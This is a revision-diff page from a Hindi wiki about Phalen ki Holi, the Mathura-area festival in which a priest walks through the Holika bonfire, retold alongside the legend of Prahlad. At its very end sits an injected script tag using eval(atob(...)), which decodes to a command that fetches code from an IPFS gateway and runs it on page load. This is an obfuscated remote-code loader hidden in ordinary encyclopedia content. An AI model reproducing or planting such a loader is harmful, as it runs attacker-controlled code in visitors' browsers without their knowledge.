Difference between revisions of "फालेन की होली"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''फालेन की होली''' मथुरा, उत्तर प्रदेश के एक ग्राम ...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
'''फालेन की होली''' [[मथुरा]], [[उत्तर प्रदेश]] के एक [[ग्राम]] फालेन में मनाई जाती है। फालेन ग्राम की यह अनूठी [[होली]] विश्व प्रसिद्ध है। इसमें [[होलिका दहन]] के समय एक पुरोहित, जिसे पण्डा कहा जाता है, नंगे पाँव जलती हुई [[अग्नि]] के बीच से निकलता हुआ एक कुण्ड में कूद जाता है। आश्चर्य का विषय यह है कि उस पर जलती हुई अग्नि का कोई प्रभाव नहीं पड़ता। यह जलती हुई अग्नि से [[प्रह्लाद]] के अनाहत, अक्षत रूप से निकलने का प्रतीक है।  
+
{{सूचना बक्सा संक्षिप्त परिचय
 +
|चित्र=Holi-Holika-Dahan-Mathura.jpg
 +
|चित्र का नाम=होलिका दहन, मथुरा
 +
|विवरण='फालेन की होली' प्रसिद्ध धार्मिक नगरी [[मथुरा]] के एक [[ग्राम]] 'फालेन' में मनाई जाती है। यहाँ जलती हुई [[अग्नि]] के बीच से एक पण्डा गुजरता है, जिसे अग्नि से कोई हानि नहीं पहुँचती।
 +
|शीर्षक 1=राज्य
 +
|पाठ 1=[[उत्तर प्रदेश]]
 +
|शीर्षक 2=ज़िला
 +
|पाठ 2=[[मथुरा]]
 +
|शीर्षक 3=ग्राम
 +
|पाठ 3=फालेन
 +
|शीर्षक 4=धार्मिक आस्था
 +
|पाठ 4=पण्डा का अग्नि से बच निकलना, जलती हुई अग्नि से भक्त [[प्रह्लाद]] के अनाहत, अक्षत रूप से निकलने का प्रतीक है।
 +
|शीर्षक 5=
 +
|पाठ 5=
 +
|शीर्षक 6=
 +
|पाठ 6=
 +
|शीर्षक 7=
 +
|पाठ 7=
 +
|शीर्षक 8=
 +
|पाठ 8=
 +
|शीर्षक 9=
 +
|पाठ 9=
 +
|शीर्षक 10=
 +
|पाठ 10=
 +
|संबंधित लेख=[[होली]], [[होलिका]], [[होलिका दहन]], [[प्रह्लाद]], [[हिरण्यकशिपु]]
 +
|अन्य जानकारी=फालेन में [[प्रह्लाद]] का एक प्राचीन मन्दिर और एक कुण्ड है। [[ग्राम]] का एक पण्डा भक्त प्रह्लाद के आशीर्वाद से सज्जित माला को धारण किये हुए होली की पवित्र अग्नि में प्रवेश करता है।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
 
 +
'''फालेन की होली''' [[मथुरा]], [[उत्तर प्रदेश]] के एक [[ग्राम]] फालेन में मनाई जाती है। फालेन ग्राम की यह अनूठी [[होली]] विश्व प्रसिद्ध है। इसमें [[होलिका दहन]] के समय एक पुरोहित, जिसे पण्डा कहा जाता है, नंगे पाँव जलती हुई [[अग्नि]] के बीच से निकलता हुआ एक कुण्ड में कूद जाता है। आश्चर्य का विषय यह है कि उस पर जलती हुई अग्नि का कोई प्रभाव नहीं पड़ता। यह जलती हुई अग्नि से [[प्रह्लाद]] के अनाहत, अक्षत रूप से निकलने का प्रतीक है।
 
==होली महोत्सव की तैयारियाँ==
 
==होली महोत्सव की तैयारियाँ==
 
<blockquote>'''कैसा है यह देश निगोरा, सब जग होरी या ब्रज होरा'''</blockquote>
 
<blockquote>'''कैसा है यह देश निगोरा, सब जग होरी या ब्रज होरा'''</blockquote>
Line 7: Line 37:
 
पुरातन धार्मिक [[कथा]] के अनुसार, कहा जाता है कि [[दैत्य|दैत्यों]] का राजा [[हिरण्यकशिपु]] बहुत ही अत्याचारी और अधर्मी राजा था, परन्तु उसका पुत्र [[प्रह्लाद]] बहुत ही दयालु और धार्मिक था और [[भगवान विष्णु]] का परम [[भक्त]] था। क्योंकि हिरण्यकशिपु विष्णु विरोधी था, इसीलिए उसे यह पसन्द नहीं था। अतः राजा हिरण्यकशिपु ने प्रह्लाद को मारने के लिये योजना बनाई और अपनी बहन [[होलिका]] को प्रह्लाद को अपनी गोद में लेकर [[अग्नि]] में बैठने को कहा। [[ब्रह्मा]] के वरदान के अनुसार होलिका को अग्नि जला नहीं सकती थी, अतः होलिका बालक प्रह्लाद को अपनी गोद में लेकर धधकती अग्नि में प्रवेश कर गयी। [[भक्ति]] की शक्ति के प्रताप के कारण प्रह्लाद तो बच गये, परन्तु होलिका रूपी पाप अग्नि की उन पवित्र लपटों में जलकर खाक हो गया। फालेन का यह होली महोत्सव इसी पुरातन कथा को चरितार्थ करता है।<ref>{{cite web |url= http://www.brajdarshan.in/%E0%A4%AB%E0%A4%BE%E0%A4%B2%E0%A5%87%E0%A4%A8-%E0%A4%95%E0%A5%80-%E0%A4%85%E0%A4%A8%E0%A5%8B%E0%A4%96%E0%A5%80-%E0%A4%B9%E0%A5%8B%E0%A4%B2%E0%A5%80/|title=फालेन की अनोखी होली|accessmonthday= 05 मार्च|accessyear= 2015|last= |first= |authorlink= |format= |publisher= ब्रजदर्शन|language= हिन्दी}}</ref>
 
पुरातन धार्मिक [[कथा]] के अनुसार, कहा जाता है कि [[दैत्य|दैत्यों]] का राजा [[हिरण्यकशिपु]] बहुत ही अत्याचारी और अधर्मी राजा था, परन्तु उसका पुत्र [[प्रह्लाद]] बहुत ही दयालु और धार्मिक था और [[भगवान विष्णु]] का परम [[भक्त]] था। क्योंकि हिरण्यकशिपु विष्णु विरोधी था, इसीलिए उसे यह पसन्द नहीं था। अतः राजा हिरण्यकशिपु ने प्रह्लाद को मारने के लिये योजना बनाई और अपनी बहन [[होलिका]] को प्रह्लाद को अपनी गोद में लेकर [[अग्नि]] में बैठने को कहा। [[ब्रह्मा]] के वरदान के अनुसार होलिका को अग्नि जला नहीं सकती थी, अतः होलिका बालक प्रह्लाद को अपनी गोद में लेकर धधकती अग्नि में प्रवेश कर गयी। [[भक्ति]] की शक्ति के प्रताप के कारण प्रह्लाद तो बच गये, परन्तु होलिका रूपी पाप अग्नि की उन पवित्र लपटों में जलकर खाक हो गया। फालेन का यह होली महोत्सव इसी पुरातन कथा को चरितार्थ करता है।<ref>{{cite web |url= http://www.brajdarshan.in/%E0%A4%AB%E0%A4%BE%E0%A4%B2%E0%A5%87%E0%A4%A8-%E0%A4%95%E0%A5%80-%E0%A4%85%E0%A4%A8%E0%A5%8B%E0%A4%96%E0%A5%80-%E0%A4%B9%E0%A5%8B%E0%A4%B2%E0%A5%80/|title=फालेन की अनोखी होली|accessmonthday= 05 मार्च|accessyear= 2015|last= |first= |authorlink= |format= |publisher= ब्रजदर्शन|language= हिन्दी}}</ref>
 
==पण्डा द्वारा अग्नि में प्रवेश==
 
==पण्डा द्वारा अग्नि में प्रवेश==
 +
[[चित्र:Holi Phalen Mathura.jpg|thumb|250px|फालेन की होली में पण्डा द्वारा [[अग्नि]] में प्रवेश]]
 
फालेन में [[प्रह्लाद]] का एक प्राचीन मन्दिर और एक कुण्ड है। हर [[वर्ष]] [[होलिका दहन]] के दिन प्रह्लाद कुण्ड में [[स्नान]] करने और वहां स्थित मन्दिर में [[पूजा]] करने के पश्चात [[ग्राम]] का एक पण्डा भक्त प्रह्लाद के आशीर्वाद से सज्जित माला को धारण किये हुए होली की पवित्र अग्नि में प्रवेश करता है और धधकते अंगारो पर चलते हुए सकुशल बाहर निकल आता है। रात्रि के जिस समय यह पण्डा होली की धधकती ज्वाला को पार करता है, तब सारा गांव [[ढोल]]-नगाड़ों और रसियों की आवाज़ से गुंजायमान हो उठता है। साहस और भक्ति का ये अनोखा कृत्य यहां मौजूद सभी दर्शकों को अचंभित कर देता है।
 
फालेन में [[प्रह्लाद]] का एक प्राचीन मन्दिर और एक कुण्ड है। हर [[वर्ष]] [[होलिका दहन]] के दिन प्रह्लाद कुण्ड में [[स्नान]] करने और वहां स्थित मन्दिर में [[पूजा]] करने के पश्चात [[ग्राम]] का एक पण्डा भक्त प्रह्लाद के आशीर्वाद से सज्जित माला को धारण किये हुए होली की पवित्र अग्नि में प्रवेश करता है और धधकते अंगारो पर चलते हुए सकुशल बाहर निकल आता है। रात्रि के जिस समय यह पण्डा होली की धधकती ज्वाला को पार करता है, तब सारा गांव [[ढोल]]-नगाड़ों और रसियों की आवाज़ से गुंजायमान हो उठता है। साहस और भक्ति का ये अनोखा कृत्य यहां मौजूद सभी दर्शकों को अचंभित कर देता है।
 
==धार्मिक परम्परा==
 
==धार्मिक परम्परा==

Revision as of 06:41, 5 March 2015

phalen ki holi
vivaran 'phalen ki holi' prasiddh dharmik nagari mathura ke ek gram 'phalen' mean manaee jati hai. yahaan jalati huee agni ke bich se ek panda gujarata hai, jise agni se koee hani nahian pahuanchati.
rajy uttar pradesh
zila mathura
gram phalen
dharmik astha panda ka agni se bach nikalana, jalati huee agni se bhakt prahlad ke anahat, akshat roop se nikalane ka pratik hai.
sanbandhit lekh holi, holika, holika dahan, prahlad, hiranyakashipu
any janakari phalen mean prahlad ka ek prachin mandir aur ek kund hai. gram ka ek panda bhakt prahlad ke ashirvad se sajjit mala ko dharan kiye hue holi ki pavitr agni mean pravesh karata hai.

phalen ki holi mathura, uttar pradesh ke ek gram phalen mean manaee jati hai. phalen gram ki yah anoothi holi vishv prasiddh hai. isamean holika dahan ke samay ek purohit, jise panda kaha jata hai, nange paanv jalati huee agni ke bich se nikalata hua ek kund mean kood jata hai. ashchary ka vishay yah hai ki us par jalati huee agni ka koee prabhav nahian p data. yah jalati huee agni se prahlad ke anahat, akshat roop se nikalane ka pratik hai.

holi mahotsav ki taiyariyaan

kaisa hai yah desh nigora, sab jag hori ya braj hora

uparokt panktiyoan ko charitarth karate hue brajamandal mean b de hi utsah ke sath 40 divasiy holi mahotsav ki taiyariyaan shuru ho jati haian. jahaan braj ke mandir phag ke rasiyoan ki dhun se guanjayaman rahate haian, vahian doosari or kosi se karib 58 kilomitar age braj ke phalen namak gram mean hone vale anoothe holi mahotsav ki taiyariyaan bhi joroan par rahati hai. holi ki puratan-paranparik katha se prabhavit phalen ka yah anootha holi mahotsav "buraee par achchhaee ki jit" ko darshata hai.

puratan katha

puratan dharmik katha ke anusar, kaha jata hai ki daityoan ka raja hiranyakashipu bahut hi atyachari aur adharmi raja tha, parantu usaka putr prahlad bahut hi dayalu aur dharmik tha aur bhagavan vishnu ka param bhakt tha. kyoanki hiranyakashipu vishnu virodhi tha, isilie use yah pasand nahian tha. atah raja hiranyakashipu ne prahlad ko marane ke liye yojana banaee aur apani bahan holika ko prahlad ko apani god mean lekar agni mean baithane ko kaha. brahma ke varadan ke anusar holika ko agni jala nahian sakati thi, atah holika balak prahlad ko apani god mean lekar dhadhakati agni mean pravesh kar gayi. bhakti ki shakti ke pratap ke karan prahlad to bach gaye, parantu holika roopi pap agni ki un pavitr lapatoan mean jalakar khak ho gaya. phalen ka yah holi mahotsav isi puratan katha ko charitarth karata hai.[1]

panda dvara agni mean pravesh

[[chitr:Holi Phalen Mathura.jpg|thumb|250px|phalen ki holi mean panda dvara agni mean pravesh]] phalen mean prahlad ka ek prachin mandir aur ek kund hai. har varsh holika dahan ke din prahlad kund mean snan karane aur vahaan sthit mandir mean pooja karane ke pashchat gram ka ek panda bhakt prahlad ke ashirvad se sajjit mala ko dharan kiye hue holi ki pavitr agni mean pravesh karata hai aur dhadhakate aangaro par chalate hue sakushal bahar nikal ata hai. ratri ke jis samay yah panda holi ki dhadhakati jvala ko par karata hai, tab sara gaanv dhol-naga doan aur rasiyoan ki avaz se guanjayaman ho uthata hai. sahas aur bhakti ka ye anokha krity yahaan maujood sabhi darshakoan ko achanbhit kar deta hai.

dharmik parampara

phalen gram mean yah paranpara kee varshoan se chali a rahi hai. phalen mahotsav mean hone vale is anoothe aur sahasik krity ko dekhane ke liye bhari sankhya mean deshi hi nahian, apitu videshi paryatak bhi holi se poorv yahaan jama hone lagate haian aur holi ke is anokhe utsav ka anand lete haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. phalen ki anokhi holi (hindi) brajadarshan. abhigaman tithi: 05 march, 2015.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>